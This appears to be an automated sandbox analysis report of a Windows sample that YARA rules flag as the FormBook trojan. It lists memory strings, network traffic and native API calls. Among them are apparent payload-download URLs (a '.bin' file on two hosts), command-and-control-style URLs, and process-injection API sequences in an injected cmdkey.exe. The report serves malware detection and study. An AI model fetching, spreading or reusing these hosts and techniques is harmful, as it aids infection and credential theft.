20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 Data Ascii: 11ab<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" />
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004426000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9w
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodo
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ImBm40hNZ2.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: ImBm40hNZ2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: cmdkey.exe, 00000005.00000002.21526958095.00000000056FE000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000048EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tilda.cc
        Source: cmdkey.exe, 00000005.00000002.21526958095.00000000056FE000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000048EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tilda.ws/img/logo404.png
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524896579.000000000133F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524896579.000000000133F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz/o0e7/
        Source: cmdkey.exe, 00000005.00000002.21528212418.0000000006650000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.000000000474A000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728474078.0025735182&other_args=eyJ1cmkiOiAiL28wZTci
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.meetfactory.biz/
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004114000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cannulafactory.top/y82c?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DP
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004D92000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003F82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387345441.0000000003141000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: cmdkey.exe, 00000005.00000002.21523901420.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: cmdkey.exe, 00000005.00000003.17386369697.0000000008076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.bin
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.bincZ
        Source: ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.binhttps://www.groupriam.com/sCvgayhFHxN196.binMasssClipro
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?v
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/libs/autocomplete.min.js?ver=7.6.0
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/ajaxSearch.min.js?ve
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/helpers.min.js?ver=7
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/hiddenSidebar.min.js
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/scrollTop.min.js?ver
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/widgetCollapse.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/header/headerBuilder.min.js
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuOffsets.min.js?ver
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuSetUp.min.js?ver=7
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/mobileNavigation.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/simpleDropdown.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/cartWidget.min.js?ver=7.
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/loginSidebar.min.js?ver=
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/onRemoveFromCart.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/stickySidebarBtn.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/wishlist.min.js?ver=7.6.
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/woocommerceNotices.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/woodmartCompare.min.js?v
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-json/
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/zI?
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003C5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004294000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003484000.00000004.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000045CA000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.17498389516.000000000DAA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/?N
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/oN
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bin
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bin)
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binA
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binpZ
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bins
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bintEZ
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binws
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hypepgbet.online/b4j0/?9B6h=KngNaAOjL/iTBaPxCGh1gxfB4GNPew7mjLKUgaHVamCvjinOC9GX1YGQY2QJ
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49739 version: TLS 1.2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00404FBA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FBA

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339434E0 NtCreateMutant,LdrInitializeThunk,3_2_339434E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_33942B90
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_33942D10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33944260 NtSetContextThread,3_2_33944260
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33944570 NtSuspendThread,3_2_33944570
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B80 NtCreateKey,3_2_33942B80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942BC0 NtQueryInformationToken,3_2_33942BC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942BE0 NtQueryVirtualMemory,3_2_33942BE0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B10 NtAllocateVirtualMemory,3_2_33942B10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B00 NtQueryValueKey,3_2_33942B00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B20 NtQueryInformationProcess,3_2_33942B20
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942A80 NtClose,3_2_33942A80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942AA0 NtQueryInformationFile,3_2_33942AA0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942AC0 NtEnumerateValueKey,3_2_33942AC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942A10 NtWriteFile,3_2_33942A10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339429D0 NtWaitForSingleObject,3_2_339429D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339429F0 NtReadFile,3_2_339429F0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339438D0 NtGetContextThread,3_2_339438D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942FB0 NtSetValueKey,3_2_33942FB0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942F00 NtCreateFile,3_2_33942F00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942F30 NtOpenDirectoryObject,3_2_33942F30
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E80 NtCreateProcessEx,3_2_33942E80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942EB0 NtProtectVirtualMemory,3_2_33942EB0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942ED0 NtResumeThread,3_2_33942ED0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942EC0 NtQuerySection,3_2_33942EC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E00 NtQueueApcThread,3_2_33942E00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E50 NtCreateSection,3_2_33942E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F4260 NtSetContextThread,LdrInitializeThunk,5_2_038F4260
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F4570 NtSuspendThread,LdrInitializeThunk,5_2_038F4570
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F34E0 NtCreateMutant,LdrInitializeThunk,5_2_038F34E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B80 NtCreateKey,LdrInitializeThunk,5_2_038F2B80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_038F2B90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_038F2BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B00 NtQueryValueKey,LdrInitializeThunk,5_2_038F2B00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_038F2B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2A80 NtClose,LdrInitializeThunk,5_2_038F2A80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_038F2AC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2A10 NtWriteFile,LdrInitializeThunk,5_2_038F2A10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F29F0 NtReadFile,LdrInitializeThunk,5_2_038F29F0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F38D0 NtGetContextThread,LdrInitializeThunk,5_2_038F38D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2F00 NtCreateFile,LdrInitializeThunk,5_2_038F2F00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2ED0 NtResumeThread,LdrInitializeThunk,5_2_038F2ED0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E00 NtQueueApcThread,LdrInitializeThunk,5_2_038F2E00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E50 NtCreateSection,LdrInitializeThunk,5_2_038F2E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_038F2DA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_038F2D10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2CF0 NtDelayExecution,LdrInitializeThunk,5_2_038F2CF0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_038F2C30
